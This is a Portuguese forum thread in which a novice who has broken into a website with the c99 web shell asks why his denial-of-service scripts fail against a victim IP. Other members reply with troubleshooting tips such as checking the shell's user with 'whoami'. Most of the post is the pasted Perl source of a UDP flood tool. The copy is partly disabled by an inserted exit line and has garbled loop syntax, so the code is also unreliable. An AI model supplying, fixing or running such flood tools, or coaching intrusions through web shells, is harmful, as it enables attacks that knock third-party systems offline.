Duvida Sobre Shell e Php Injection

Iniciado por Engradiel, 07 de Outubro , 2009, 06:15:17 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Engradiel

Seguinte, sou iniciante e tenho jah o site vulneravel
nele aparece Safe Mod Off e eu nao sei o que fazer depois de achar o site e usar com a shell c99. Eu ja estou dentro do site mas nao sei o que fazer...
Eu ja experimentei dar load no upd.pl e no f3. pl que possuem esses codigos.

eu dou load dai depois eu dou o comando perl udp.pl ou f3.pl ipdavitima 0 50000000 e dou execute e nao acontece nada...? o que pode ser me ajudem se estou fazendo alguma coisa errada.Porfavor
Agradeço a todos que ajudaram e mandarem msg
udp?

#!/usr/bin/perl
################################################## ###
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
################################################## ####

# pseudo-crippled by packetstorm to stop script kiddies.
exit(0);
#

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (; {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (; {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}



f3

Joey

#1
algumas shells não tem permissão para executar comandos.
Com um punhado de areia eu mostrarei o terror à vocês.

Reeves

seja mais explicito com sua dúvida.

Qual o seu objetivo?
Qual id a shell está rodando? usuario do apache? root? use o 'whoami' e me diga!
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^